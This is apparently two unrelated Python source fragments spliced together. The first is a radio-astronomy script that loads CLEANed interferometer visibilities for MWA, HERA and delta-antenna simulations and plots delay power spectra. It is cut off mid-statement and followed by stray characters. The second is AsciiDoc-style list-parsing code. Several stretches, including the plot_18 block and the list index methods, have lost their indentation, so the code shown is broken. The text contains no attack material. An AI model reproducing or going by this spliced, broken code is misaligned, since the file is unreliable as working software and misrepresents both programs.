delta_array_usm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_array_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_usm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
delta_array_asm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_array_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_asm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
mwa_dipole_asm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/mwa_dipole_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_asm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
hera_asm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/hera_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_asm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
delta_usm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_multi_baseline_CLEAN_visibilities_no_ground_'+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_usm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
    # Shared setup for plots 17/18/19: load the simulated interferometer
    # array, fold negative baseline orientations onto their conjugates, read
    # the CLEANed visibility products for each telescope/sky-model
    # combination, and build the delay-space selection windows.
    ia = RI.InterferometerArray(None, None, None, init_file=delta_array_usm_infile+'.fits')
    # Baselines oriented beyond 90 deg (plus half a bin) are flipped; their
    # visibilities must later be conjugated to match (done per-plot below).
    simdata_bl_orientation = NP.angle(ia.baselines[:,0] + 1j * ia.baselines[:,1], deg=True)
    simdata_neg_bl_orientation_ind = simdata_bl_orientation > 90.0 + 0.5*180.0/n_bins_baseline_orientation
    simdata_bl_orientation[simdata_neg_bl_orientation_ind] -= 180.0
    ia.baselines[simdata_neg_bl_orientation_ind,:] = -ia.baselines[simdata_neg_bl_orientation_ind,:]
    # Observation metadata (latitude, pointing coordinate system, LSTs).
    hdulist = fits.open(delta_array_usm_infile+'.fits')
    latitude = hdulist[0].header['latitude']
    pointing_coords = hdulist[0].header['pointing_coords']
    pointings_table = hdulist['POINTING AND PHASE CENTER INFO'].data
    lst = pointings_table['LST']
    n_snaps = lst.size
    hdulist.close()
    # Convert pointings into all three coordinate systems regardless of the
    # system they were recorded in.
    if pointing_coords == 'altaz':
        pointings_altaz = NP.hstack((pointings_table['pointing_latitude'].reshape(-1,1), pointings_table['pointing_longitude'].reshape(-1,1)))
        pointings_hadec = GEOM.altaz2hadec(pointings_altaz, latitude, units='degrees')
        pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
    elif pointing_coords == 'radec':
        pointings_radec = NP.hstack((pointings_table['pointing_longitude'].reshape(-1,1), pointings_table['pointing_latitude'].reshape(-1,1)))
        pointings_hadec = NP.hstack(((lst-pointings_radec[:,0]).reshape(-1,1), pointings_radec[:,1].reshape(-1,1)))
        pointings_altaz = GEOM.hadec2altaz(pointings_hadec, latitude, units='degrees')
        pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
    elif pointing_coords == 'hadec':
        pointings_hadec = NP.hstack((pointings_table['pointing_longitude'].reshape(-1,1), pointings_table['pointing_latitude'].reshape(-1,1)))
        pointings_radec = NP.hstack(((lst-pointings_hadec[:,0]).reshape(-1,1), pointings_hadec[:,1].reshape(-1,1)))
        pointings_altaz = GEOM.hadec2altaz(pointings_hadec, latitude, units='degrees')
        pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
    # CLEAN products: for each input file read the four complex visibility
    # cubes (noiseless/noisy, main/residuals) as REAL + 1j*IMAG extensions.
    hdulist = fits.open(delta_array_usm_CLEAN_infile+'.fits')
    clean_lags = hdulist['SPECTRAL INFO'].data['lag']
    clean_lags_orig = NP.copy(clean_lags)
    delta_array_usm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
    delta_array_usm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
    delta_array_usm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
    delta_array_usm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
    hdulist.close()
    hdulist = fits.open(delta_array_asm_CLEAN_infile+'.fits')
    delta_array_asm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
    delta_array_asm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
    delta_array_asm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
    delta_array_asm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
    hdulist.close()
    hdulist = fits.open(mwa_dipole_asm_CLEAN_infile+'.fits')
    mwa_dipole_asm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
    mwa_dipole_asm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
    mwa_dipole_asm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
    mwa_dipole_asm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
    hdulist.close()
    hdulist = fits.open(hera_asm_CLEAN_infile+'.fits')
    hera_asm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
    hera_asm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
    hera_asm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
    hera_asm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
    hdulist.close()
    hdulist = fits.open(delta_usm_CLEAN_infile+'.fits')
    delta_usm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
    delta_usm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
    delta_usm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
    delta_usm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
    hdulist.close()
    # Downsample the CLEAN lag axis to the simulation's lag resolution and
    # compute the per-baseline horizon delay envelope.
    clean_lags = DSP.downsampler(clean_lags, 1.0*clean_lags.size/ia.lags.size, axis=-1)
    clean_lags = clean_lags.ravel()
    delaymat = DLY.delay_envelope(ia.baselines[truncated_ref_bl_ind,:], pc, units='mks')
    bw = nchan * freq_resolution
    min_delay = -delaymat[0,:,1]-delaymat[0,:,0]
    max_delay = delaymat[0,:,0]-delaymat[0,:,1]
    clags = clean_lags.reshape(1,-1)
    min_delay = min_delay.reshape(-1,1)
    max_delay = max_delay.reshape(-1,1)
    # Boolean masks over the (baseline, lag) plane: thermal-noise region,
    # EoR window (outside the wedge plus a 3/bandwidth buffer), a stricter
    # EoR window clipped at the delay-grating limit, and the wedge itself.
    thermal_noise_window = NP.abs(clags) >= max_abs_delay*1e-6
    thermal_noise_window = NP.repeat(thermal_noise_window, ia.baselines[truncated_ref_bl_ind,:].shape[0], axis=0)
    EoR_window = NP.logical_or(clags > max_delay+3/bw, clags < min_delay-3/bw)
    strict_EoR_window = NP.logical_and(EoR_window, NP.abs(clags) < 1/coarse_channel_resolution)
    wedge_window = NP.logical_and(clags <= max_delay, clags >= min_delay)
    non_wedge_window = NP.logical_not(wedge_window)
    small_delays_EoR_window = EoR_window.T
    small_delays_strict_EoR_window = strict_EoR_window.T
    small_delays_wedge_window = wedge_window.T
    # Optionally trim everything to |tau| <= max_abs_delay (in microseconds).
    if max_abs_delay is not None:
        small_delays_ind = NP.abs(clean_lags) <= max_abs_delay * 1e-6
        clean_lags = clean_lags[small_delays_ind]
        small_delays_EoR_window = small_delays_EoR_window[small_delays_ind,:]
        small_delays_strict_EoR_window = small_delays_strict_EoR_window[small_delays_ind,:]
        small_delays_wedge_window = small_delays_wedge_window[small_delays_ind,:]
    if plot_17:
        # 17) Plot delay spectra of the MWA tile power pattern using a uniform sky model
        # Conjugate visibilities on the flipped baselines, transform the
        # CLEAN components (plus residuals) to delay space, downsample to
        # the simulation lag grid, and render one power-spectrum panel per
        # snapshot with k_perp / k_parallel twin axes.
        delta_array_usm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = delta_array_usm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
        delta_array_usm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = delta_array_usm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
        # Inverse FFT along the frequency axis -> delay spectrum; the
        # shape[1]*freq_resolution factor converts to delay-space amplitude.
        delta_array_usm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(delta_array_usm_cc_skyvis, axis=1),axes=1) * delta_array_usm_cc_skyvis.shape[1] * freq_resolution
        delta_array_usm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(delta_array_usm_cc_skyvis_res, axis=1),axes=1) * delta_array_usm_cc_skyvis.shape[1] * freq_resolution
        delta_array_usm_cc_skyvis_lag = delta_array_usm_cc_skyvis_lag + delta_array_usm_ccres_sky
        delta_array_usm_cc_skyvis_lag = DSP.downsampler(delta_array_usm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
        delta_array_usm_cc_skyvis_lag = delta_array_usm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
        delta_array_usm_dspec_max = NP.abs(delta_array_usm_cc_skyvis_lag).max()
        delta_array_usm_dspec_min = NP.abs(delta_array_usm_cc_skyvis_lag).min()
        # delta_array_usm_dspec_max = delta_array_usm_dspec_max**2 * volfactor1 * volfactor2 * Jy2K**2
        # delta_array_usm_dspec_min = delta_array_usm_dspec_min**2 * volfactor1 * volfactor2 * Jy2K**2
        if max_abs_delay is not None:
            delta_array_usm_cc_skyvis_lag = delta_array_usm_cc_skyvis_lag[:,small_delays_ind,:]
        # One vertically-stacked panel per snapshot, log-scaled power in
        # K^2 (Mpc/h)^3 (the volfactor/Jy2K conversion), horizon overplotted.
        fig, axs = PLT.subplots(n_snaps, sharex=True, sharey=True, figsize=(6,6))
        for j in xrange(n_snaps):
            imdspec = axs[j].pcolorfast(truncated_ref_bl_length, 1e6*clean_lags, NP.abs(delta_array_usm_cc_skyvis_lag[:-1,:-1,j].T)**2 * volfactor1 * volfactor2 * Jy2K**2, norm=PLTC.LogNorm(vmin=(1e5**2) * volfactor1 * volfactor2 * Jy2K**2, vmax=(delta_array_usm_dspec_max**2) * volfactor1 * volfactor2 * Jy2K**2))
            horizonb = axs[j].plot(truncated_ref_bl_length, 1e6*min_delay.ravel(), color='white', ls=':', lw=1.5)
            horizont = axs[j].plot(truncated_ref_bl_length, 1e6*max_delay.ravel(), color='white', ls=':', lw=1.5)
            axs[j].set_ylim(0.9*NP.amin(clean_lags*1e6), 0.9*NP.amax(clean_lags*1e6))
            axs[j].set_aspect('auto')
            axs[j].text(0.5, 0.9, descriptor_str[j], transform=axs[j].transAxes, fontsize=14, weight='semibold', ha='center', color='white')
        # Second pass: attach cosmological twin axes (k_parallel on every
        # panel's right edge, k_perp only above the top panel).
        for j in xrange(n_snaps):
            axs_kprll = axs[j].twinx()
            axs_kprll.set_yticks(kprll(axs[j].get_yticks()*1e-6, redshift))
            axs_kprll.set_ylim(kprll(NP.asarray(axs[j].get_ylim())*1e-6, redshift))
            yformatter = FuncFormatter(lambda y, pos: '{0:.2f}'.format(y))
            axs_kprll.yaxis.set_major_formatter(yformatter)
            if j == 0:
                axs_kperp = axs[j].twiny()
                axs_kperp.set_xticks(kperp(axs[j].get_xticks()*freq/FCNST.c, redshift))
                axs_kperp.set_xlim(kperp(NP.asarray(axs[j].get_xlim())*freq/FCNST.c, redshift))
                xformatter = FuncFormatter(lambda x, pos: '{0:.3f}'.format(x))
                axs_kperp.xaxis.set_major_formatter(xformatter)
        fig.subplots_adjust(hspace=0)
        # Invisible full-figure axes used only to carry shared axis labels.
        big_ax = fig.add_subplot(111)
        big_ax.set_axis_bgcolor('none')
        big_ax.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
        big_ax.set_xticks([])
        big_ax.set_yticks([])
        big_ax.set_ylabel(r'$\tau$ [$\mu$s]', fontsize=16, weight='medium', labelpad=30)
        big_ax.set_xlabel(r'$|\mathbf{b}|$ [m]', fontsize=16, weight='medium', labelpad=20)
        big_axr = big_ax.twinx()
        big_axr.set_axis_bgcolor('none')
        big_axr.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
        big_axr.set_xticks([])
        big_axr.set_yticks([])
        big_axr.set_ylabel(r'$k_\parallel$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium', labelpad=40)
        big_axt = big_ax.twiny()
        big_axt.set_axis_bgcolor('none')
        big_axt.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
        big_axt.set_xticks([])
        big_axt.set_yticks([])
        big_axt.set_xlabel(r'$k_\perp$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium', labelpad=30)
        # Shared colorbar on the right; save raster and vector versions.
        cbax = fig.add_axes([0.9, 0.125, 0.02, 0.74])
        cbar = fig.colorbar(imdspec, cax=cbax, orientation='vertical')
        cbax.set_xlabel(r'K$^2$(Mpc/h)$^3$', labelpad=10, fontsize=12)
        cbax.xaxis.set_label_position('top')
        # PLT.tight_layout()
        fig.subplots_adjust(right=0.72)
        fig.subplots_adjust(top=0.88)
        PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/delta_array_multi_baseline_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_usm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'_no_pfb_{0:.1f}'.format(oversampling_factor)+'.png', bbox_inches=0)
        PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/delta_array_multi_baseline_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_usm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'_no_pfb_{0:.1f}'.format(oversampling_factor)+'.eps', bbox_inches=0)
##################################################################
if plot_18:
# 18) Plot delay spectra of the all-sky model with dipole, MWA tile, and HERA dish antenna shapes
mwa_dipole_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = mwa_dipole_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
mwa_dipole_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = mwa_dipole_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
mwa_dipole_asm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(mwa_dipole_asm_cc_skyvis, axis=1),axes=1) * mwa_dipole_asm_cc_skyvis.shape[1] * freq_resolution
mwa_dipole_asm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(mwa_dipole_asm_cc_skyvis_res, axis=1),axes=1) * mwa_dipole_asm_cc_skyvis.shape[1] * freq_resolution
mwa_dipole_asm_cc_skyvis_lag = mwa_dipole_asm_cc_skyvis_lag + mwa_dipole_asm_ccres_sky
mwa_dipole_asm_cc_skyvis_lag = DSP.downsampler(mwa_dipole_asm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
delta_array_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = delta_array_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
delta_array_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = delta_array_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
delta_array_asm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(delta_array_asm_cc_skyvis, axis=1),axes=1) * delta_array_asm_cc_skyvis.shape[1] * freq_resolution
delta_array_asm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(delta_array_asm_cc_skyvis_res, axis=1),axes=1) * delta_array_asm_cc_skyvis.shape[1] * freq_resolution
delta_array_asm_cc_skyvis_lag = delta_array_asm_cc_skyvis_lag + delta_array_asm_ccres_sky
delta_array_asm_cc_skyvis_lag = DSP.downsampler(delta_array_asm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
hera_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = hera_asm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
hera_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = hera_asm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
hera_asm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(hera_asm_cc_skyvis, axis=1),axes=1) * hera_asm_cc_skyvis.shape[1] * freq_resolution
hera_asm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(hera_asm_cc_skyvis_res, axis=1),axes=1) * hera_asm_cc_skyvis.shape[1] * freq_resolution
hera_asm_cc_skyvis_lag = hera_asm_cc_skyvis_lag + hera_asm_ccres_sky
hera_asm_cc_skyvis_lag = DSP.downsampler(hera_asm_cc_skyvis_lag, 1.0*clean_lags_orig.size/ia.lags.size, axis=1)
delta_array_asm_cc_skyvis_lag = delta_array_asm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
mwa_dipole_asm_cc_skyvis_lag = mwa_dipole_asm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
hera_asm_cc_skyvis_lag = hera_asm_cc_skyvis_lag[truncated_ref_bl_ind,:,:]
if max_abs_delay is not None:
delta_array_asm_cc_skyvis_lag = delta_array_asm_cc_skyvis_lag[:,small_delays_ind,:]
mwa_dipole_asm_cc_skyvis_lag = mwa_dipole_asm_cc_skyvis_lag[:,small_delays_ind,:]
hera_asm_cc_skyvis_lag = hera_asm_cc_skyvis_lag[:,small_delays_ind,:]
antelem_asm_dspec_max = max([NP.abs(mwa_dipole_asm_cc_skyvis_lag).max(), NP.abs(delta_array_asm_cc_skyvis_lag).max(), NP.abs(hera_asm_cc_skyvis_lag).max()])
antelem_asm_dspec_min = min([NP.abs(mwa_dipole_asm_cc_skyvis_lag).min(), NP.abs(delta_array_asm_cc_skyvis_lag).min(), NP.abs(hera_asm_cc_skyvis_lag).min()])
# antelem_asm_dspec_max = antelem_asm_dspec_max**2 * volfactor1 * volfactor2 * Jy2K**2
# antelem_asm_dspec_min = antelem_asm_dspec_min**2 * volfactor1 * volfactor2 * Jy2K**2
delta_array_roifile = '/data3/t_nithyanandan/'+project_dir+'/roi_info_delta_array_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_asm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz'.format(Tsys, | |
is self:
reader.read() # Discard (already parsed item first line).
writer.write_tag(self.tag.term, [self.label],
self.presubs, self.attributes,trace='list term')
if self.text: break
writer.write(labeltag[1],trace='list label close')
# Write item text.
self.translate_item()
writer.write(entrytag[1],trace='list entry close')
    def translate_item(self):
        """Translate a single list item: write the item open tag, the item
        text (read from the global 'reader' up to the next list terminator),
        any continued (explicitly '+'-joined or implicitly nested) elements,
        and finally the item close tag.  Output goes to the global 'writer'."""
        if self.type == 'callout':
            # Attach the callout ids collected for this ordinal position.
            self.attributes['coids'] = calloutmap.calloutids(self.ordinal)
        itemtag = subs_tag(self.tag.item, self.attributes)
        writer.write(itemtag[0],trace='list item open')
        # Write ItemText.
        text = reader.read_until(lists.terminators)
        if self.text:
            # Text on the same line as the item marker comes first.
            text = [self.text] + list(text)
        if text:
            writer.write_tag(self.tag.text, text, self.presubs, self.attributes,trace='list text')
        # Process explicit and implicit list item continuations.
        while True:
            continuation = reader.read_next() == '+'
            if continuation: reader.read() # Discard continuation line.
            while Lex.next() in (BlockTitle,AttributeList):
                # Consume continued element title and attributes.
                Lex.next().translate()
            if not continuation and BlockTitle.title:
                # Titled elements terminate the list.
                break
            # NOTE: 'next' shadows the builtin; kept for historical style.
            next = Lex.next()
            if next in lists.open:
                # Same list (or an ancestor) continues -- hand control back.
                break
            elif isinstance(next,List):
                next.translate()
            elif isinstance(next,Paragraph) and 'listelement' in next.options:
                next.translate()
            elif continuation:
                # This is where continued elements are processed.
                if next is Title:
                    message.error('section title not allowed in list item',halt=True)
                next.translate()
            else:
                break
        writer.write(itemtag[1],trace='list item close')
@staticmethod
def calc_style(index):
"""Return the numbered list style ('arabic'...) of the list item index.
Return None if unrecognized style."""
if re.match(r'^\d+[\.>]$', index):
style = 'arabic'
elif re.match(r'^[ivx]+\)$', index):
style = 'lowerroman'
elif re.match(r'^[IVX]+\)$', index):
style = 'upperroman'
elif re.match(r'^[a-z]\.$', index):
style = 'loweralpha'
elif re.match(r'^[A-Z]\.$', index):
style = 'upperalpha'
else:
assert False
return style
@staticmethod
def calc_index(index,style):
"""Return the ordinal number of (1...) of the list item index
for the given list style."""
def roman_to_int(roman):
roman = roman.lower()
digits = {'i':1,'v':5,'x':10}
result = 0
for i in range(len(roman)):
digit = digits[roman[i]]
# If next digit is larger this digit is negative.
if i+1 < len(roman) and digits[roman[i+1]] > digit:
result -= digit
else:
result += digit
return result
index = index[:-1]
if style == 'arabic':
ordinal = int(index)
elif style == 'lowerroman':
ordinal = roman_to_int(index)
elif style == 'upperroman':
ordinal = roman_to_int(index)
elif style == 'loweralpha':
ordinal = ord(index) - ord('a') + 1
elif style == 'upperalpha':
ordinal = ord(index) - ord('A') + 1
else:
assert False
return ordinal
def check_index(self):
"""Check calculated self.ordinal (1,2,...) against the item number
in the document (self.index) and check the number style is the same as
the first item (self.number_style)."""
assert self.type in ('numbered','callout')
if self.index:
style = self.calc_style(self.index)
if style != self.number_style:
message.warning('list item style: expected %s got %s' %
(self.number_style,style), offset=1)
ordinal = self.calc_index(self.index,style)
if ordinal != self.ordinal:
message.warning('list item index: expected %s got %s' %
(self.ordinal,ordinal), offset=1)
def check_tags(self):
""" Check that all necessary tags are present. """
tags = set(Lists.TAGS)
if self.type != 'labeled':
tags = tags.difference(['entry','label','term'])
missing = tags.difference(self.tag.keys())
if missing:
self.error('missing tag(s): %s' % ','.join(missing), halt=True)
    def translate(self):
        """Translate an entire list: consume its attributes and title, pick
        the numbering style and tag set, then translate items one by one
        until the lexer no longer classifies the next element as this list.
        Maintains the global 'lists.open' stack and the document-level
        'listindex' attribute so nested lists restore their parent's index."""
        AbstractBlock.translate(self)
        if self.short_name() in ('bibliography','glossary','qanda'):
            message.deprecated('old %s list syntax' % self.short_name())
        lists.open.append(self)
        # Attributes captured by the list-item match; drop the per-item ones.
        attrs = self.mo.groupdict().copy()
        for k in ('label','text','index'):
            if k in attrs: del attrs[k]
        if self.index:
            # Set the numbering style from first list item.
            attrs['style'] = self.calc_style(self.index)
        BlockTitle.consume(attrs)
        AttributeList.consume(attrs)
        self.merge_attributes(attrs,['tags'])
        self.push_blockname()
        if self.type in ('numbered','callout'):
            self.number_style = self.attributes.get('style')
            if self.number_style not in self.NUMBER_STYLES:
                message.error('illegal numbered list style: %s' % self.number_style)
                # Fall back to default style.
                self.attributes['style'] = self.number_style = self.style
        self.tag = lists.tags[self.parameters.tags]
        self.check_tags()
        if 'width' in self.attributes:
            # Set horizontal list 'labelwidth' and 'itemwidth' attributes.
            v = str(self.attributes['width'])
            mo = re.match(r'^(\d{1,2})%?$',v)
            if mo:
                labelwidth = int(mo.group(1))
                self.attributes['labelwidth'] = str(labelwidth)
                self.attributes['itemwidth'] = str(100-labelwidth)
            else:
                self.error('illegal attribute value: width="%s"' % v)
        stag,etag = subs_tag(self.tag.list, self.attributes)
        if stag:
            writer.write(stag,trace='list open')
        self.ordinal = 0
        # Process list till list syntax changes or there is a new title.
        while Lex.next() is self and not BlockTitle.title:
            self.ordinal += 1
            document.attributes['listindex'] = str(self.ordinal)
            if self.type in ('numbered','callout'):
                self.check_index()
            if self.type in ('bulleted','numbered','callout'):
                reader.read() # Discard (already parsed item first line).
                self.translate_item()
            elif self.type == 'labeled':
                self.translate_entry()
            else:
                raise AssertionError,'illegal [%s] list type' % self.defname
        if etag:
            writer.write(etag,trace='list close')
        if self.type == 'callout':
            # All callout ids must have been referenced by the source.
            calloutmap.validate(self.ordinal)
            calloutmap.listclose()
        lists.open.pop()
        if len(lists.open):
            # Restore the enclosing (parent) list's item index.
            document.attributes['listindex'] = str(lists.open[-1].ordinal)
        self.pop_blockname()
class Lists(AbstractBlocks):
    """List of List objects.

    Holds every list definition loaded from [listdef-*] configuration
    sections, the [listtags-*] tag dictionaries, and the parse-time stack
    of currently open (nested) lists."""
    BLOCK_TYPE = List
    PREFIX = 'listdef-'
    # Valid list types and the tag names a list definition may supply.
    TYPES = ('bulleted','numbered','labeled','callout')
    TAGS = ('list', 'entry','item','text', 'label','term')
    def __init__(self):
        AbstractBlocks.__init__(self)
        self.open = [] # A stack of the current and parent lists.
        self.tags={} # List tags dictionary. Each entry is a tags AttrDict.
        self.terminators=None # List of compiled re's.
    def initialize(self):
        # Patterns that end a list item's text: a '+' continuation or blank
        # line, an attribute list, or any list/block/table delimiter.
        self.terminators = [
            re.compile(r'^\+$|^$'),
            re.compile(AttributeList.pattern),
            re.compile(lists.delimiters),
            re.compile(blocks.delimiters),
            re.compile(tables.delimiters),
            re.compile(tables_OLD.delimiters),
        ]
    def load(self,sections):
        AbstractBlocks.load(self,sections)
        self.load_tags(sections)
    def load_tags(self,sections):
        """
        Load listtags-* conf file sections to self.tags.
        """
        for section in sections.keys():
